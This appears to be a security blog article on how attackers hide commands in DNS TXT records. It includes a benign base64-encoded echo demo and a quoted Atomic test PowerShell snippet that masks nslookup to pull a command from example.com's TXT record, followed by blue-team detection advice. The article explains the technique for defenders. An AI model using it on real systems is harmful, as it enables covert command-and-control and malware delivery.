A collection of cybersecurity content.

Abusing DNS: Hiding Commands in TXT Records

Intro

While TXT DNS (text domain name system) records have legitimate purposes, it is important to be aware that adversaries can exploit TXT records to hide content and commands. Adversaries may use DNS to establish communication with systems that are under their control within a victim network, all while appearing as normal, expected traffic.

What are TXT DNS Records?

TXT (Text) records are DNS records used to store human-readable text data associated with a domain. They are designed to provide additional information related to the domain, such as verification, security, or configuration data, and are not directly involved in resolving a domain to an IP address.

Check out RFC 1464 for “using the Domain Name System To Store Arbitrary String Attributes” if you would like to see official notes. TXT records have a structure that allows the domain owner to store various types of information in a text format. This includes SPF (Sender Policy Framework) records, DKIM (DomainKeys Identified Mail) keys, DMARC (Domain-based Message Authentication, Reporting and Conformance) policies, and ownership verification codes.

For instance, SPF records are used to define which mail servers are authorized to send email on behalf of a domain, while DKIM keys and DMARC policies are used to authenticate and verify email messages. Ownership verification codes can be added to a TXT record to verify domain ownership.

To provide an example, let’s see Google’s TXT records:

Abusing TXT Records

As a domain owner, we have the ability to manage DNS records like TXT records. This means that if you have access to the DNS configuration, you can make any necessary modifications to these records.

To illustrate this process from an adversarial perspective, we’ve added a TXT record to this website and encoded the message “echo 'Echoing command from txt records!'” as base64 text “ZWNobyAnRWNob2luZyBjb21tYW5kIGZyb20gdHh0IHJlY29yZHMhJw=” in the TXT record.

While this article does not cover the specifics of configuring DNS records, it is a relatively straightforward process with many resources online explaining the concepts. This example aims to provide a demonstration of the ease with which adversaries use TXT records to store and execute commands.

Let’s query our domain’s TXT records and see what this looks like:

Perfect! It only took a few minutes for this record to populate, and we can clearly see the encoded string in the TXT record. Now, let’s create a PowerShell command to reference this indexed string independently:

Decode and run the encoded string:

Great! The echo command was successfully executed. However, it is important to recognize that adversaries are unlikely to issue benign commands such as this. Instead, they may use similar tactics to achieve more malicious objectives that support their end goals, such as downloading new malware or toolsets. It is essential to be aware of the potential for malicious abuse of TXT records and to implement effective security measures to detect and prevent such attacks.

Detection

It is essential to recognize that while this exercise serves as an example of how adversaries may exploit one aspect of DNS services, this type of tactic can be used for malicious purposes such as facilitating command and control (C2) communications, exfiltrating sensitive information, injecting malware, exploiting vulnerabilities, and more, depending on how data is stored in the TXT record. Malware, for instance, can be instructed to read TXT records controlled by an attacker to obtain command instructions for a botnet. Furthermore, DNS tunneling can be employed with this tactic to avoid detection.

Blue teams should be mindful of commands that perform nslookup functionality as seen in this article. Red Canary’s Atomic tests also show how adversaries can mask their commands by calling indexes from a custom function of nslookup:

function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","powershell.exe " + (Get-Date).ToString('MM/dd/yyyy')) }
(nslookup -q=txt example.com 8.8.8.8)[-1]

Effective detection and prevention of DNS attacks requires a comprehensive and multifaceted approach. Blue teams should implement measures to monitor DNS traffic and look for abnormal patterns or behavior.

Counting excessive DNS lookups is one useful technique that can identify potential DNS tunneling. Outlier DNS traffic, such as an excessive number of DNS lookups for a single domain or very few lookups to a single domain compared to other assets in the environment, can also be indicative of malicious activity.

It is essential to also use threat intelligence feeds to identify known malicious domains or IP addresses and block or alert on any DNS requests for those assets. However, behavioral-based detections will catch the unknowns.

Encoded commands in DNS records can also be used to conceal malicious activity. Adversaries may use encoding techniques or custom obfuscation to hide data or commands, making them difficult to detect.

Conclusion

TXT records are a type of DNS record used to store text-based data associated with a domain, such as verification, security, and configuration information. Adversaries can exploit TXT records to hide malicious content and commands within them, using them to communicate with systems under their control within a victim network while appearing as normal traffic.

It is important for blue teams to monitor DNS records and look for any unusual DNS traffic, such as outlier lookups, where there are either an excessive number of DNS lookups for a single domain or very few lookups to a single domain compared to other assets in the environment. This can help identify potential security threats and prevent attacks.